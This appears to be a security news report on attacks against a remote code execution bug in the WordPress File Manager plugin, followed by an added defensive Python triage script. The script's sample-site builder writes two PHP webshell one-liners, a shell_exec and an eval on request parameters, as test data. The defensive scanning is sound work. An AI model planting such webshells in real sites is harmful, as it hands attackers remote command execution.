Attackers are exploiting a critical remote code execution bug in the WordPress File Manager plugin to upload scripts and execute arbitrary code on WordPress sites that run vulnerable versions of the plugin. The File Manager plugin, which lets users manage files directly from the WordPress dashboard, is installed on more than 700,000 WordPress sites.
The bug was discovered by Gonzalo Cruz, a researcher at Arsys, who confirmed that attackers have already started exploiting it to upload malicious PHP files to vulnerable sites. It affects all releases of the plugin from 6.0 through 6.8. The plugin's developers fixed it immediately with the release of version 6.9.
Wordfence reported that its firewall has blocked more than 450,000 attempts to exploit this bug in recent days, noting that attackers are trying to upload files whose names appear to start with "Hard" or "x". The firewall data on the attack suggests that the intruders are probing for the bug with empty files and, in some cases, attempting to upload malicious ones. The following is a list of some of the uploaded files:
- x.php
Wordfence researchers confirm that attackers are uploading PHP webshells hidden inside image files into the wp-content/plugins/wp-file-manager/lib/files/ directory. They therefore recommend updating the File Manager plugin immediately to the latest version, 6.9.
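The following triage script is an added example and is not code from the article, from Wordfence or from the plugin's developers. It does the two checks a site owner would want after reading the above: it reads the plugin's version header and reports whether it falls in the affected 6.0 to 6.8 range, and it scans the lib/files/ directory named above for PHP scripts, empty probe files and PHP code embedded in image files. The main plugin file name (file_folder_manager.php) and the standard WordPress "Version:" header line are assumptions; the sample site it builds in a temporary directory is constructed for the demonstration, not real attacker data.

```python
"""Added example: check a WordPress install for the File Manager RCE exposure.
Not from the original article, Wordfence, or the plugin authors. Paths and
the plugin header format below are assumptions."""
import os
import re
import tempfile

PLUGIN_DIR = os.path.join("wp-content", "plugins", "wp-file-manager")
PLUGIN_MAIN = "file_folder_manager.php"     # assumed name of the plugin's main file
UPLOAD_DIR = os.path.join("lib", "files")   # upload directory named in the article

VULN_MIN = (6, 0)   # first affected release reported in the article
FIXED = (6, 9)      # release that fixed the bug

SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phps", ".phar"}
PHP_MARKERS = (b"<?php", b"<?=", b'<script language="php"')


def parse_version(header_text):
    """Return the 'Version:' value of a WordPress plugin header as an int tuple."""
    m = re.search(r"^\s*\*?\s*Version:\s*([0-9]+(?:\.[0-9]+)*)", header_text, re.M)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def is_vulnerable(version):
    """True when major.minor is within 6.0 <= v < 6.9 (patch levels ignored)."""
    if version is None:
        return False
    major_minor = (tuple(version) + (0, 0))[:2]
    return VULN_MIN <= major_minor < FIXED


def classify_file(path):
    """Return a reason string if the file looks like a probe or webshell, else None."""
    ext = os.path.splitext(path)[1].lower()
    if os.path.getsize(path) == 0:
        return "empty file (matches the probe uploads the article describes)"
    with open(path, "rb") as f:
        data = f.read()
    if ext in SCRIPT_EXTS:
        return "PHP script in upload directory"
    if any(marker in data for marker in PHP_MARKERS):
        return "PHP code embedded in a non-PHP file (webshell hidden in an image)"
    return None


def scan_uploads(site_root):
    """Walk the plugin's lib/files/ directory; return [(relative_path, reason)]."""
    upload_root = os.path.join(site_root, PLUGIN_DIR, UPLOAD_DIR)
    findings = []
    for dirpath, _, filenames in os.walk(upload_root):
        for fn in sorted(filenames):
            full = os.path.join(dirpath, fn)
            reason = classify_file(full)
            if reason:
                findings.append((os.path.relpath(full, upload_root), reason))
    return findings


def check_site(site_root):
    """Combine the version check and the upload scan for one install."""
    main = os.path.join(site_root, PLUGIN_DIR, PLUGIN_MAIN)
    version = None
    if os.path.exists(main):
        with open(main, encoding="utf-8", errors="replace") as f:
            version = parse_version(f.read(4096))
    return {"version": version, "vulnerable": is_vulnerable(version),
            "findings": scan_uploads(site_root)}


def build_sample_site(root, version="6.8"):
    """Constructed sample install: vulnerable plugin, one empty probe (x.php, named
    in the article), one constructed PHP upload, a JPEG carrying a PHP tag, and a
    benign PNG. None of this is real attacker data."""
    plugin = os.path.join(root, PLUGIN_DIR)
    uploads = os.path.join(plugin, UPLOAD_DIR)
    os.makedirs(uploads)
    with open(os.path.join(plugin, PLUGIN_MAIN), "w") as f:
        f.write("<?php\n/*\nPlugin Name: File Manager\nVersion: %s\n*/\n" % version)
    samples = {
        "x.php": b"",
        "hardprobe.php": b"<?php echo shell_exec($_GET['c']); ?>",
        "photo.jpg": b"\xff\xd8\xff\xe0JFIF" + b"\x00" * 16 + b"<?php eval($_POST['x']); ?>",
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    }
    for name, data in samples.items():
        with open(os.path.join(uploads, name), "wb") as f:
            f.write(data)
    return root


def run_demo():
    """Build the constructed site in a temp dir and return check_site() on it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp, "6.8")
        return check_site(tmp)


if __name__ == "__main__":
    result = run_demo()
    print("File Manager version:", ".".join(map(str, result["version"])),
          "vulnerable:", result["vulnerable"])
    for rel, reason in result["findings"]:
        print(f"  {rel}: {reason}")
```

Point check_site() at a real document root instead of the temporary sample to use it on a live install. A finding in lib/files/ should be treated as a likely compromise rather than just a reason to update, since the article notes that uploads were already happening before the fix shipped.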
The plugin has been downloaded more than 126,000 times in the last two days, which means that at least 574,000 WordPress sites may still be exposed. Finally, it is worth noting that 51.5% of the sites using the File Manager plugin, over 300,000, run a vulnerable version.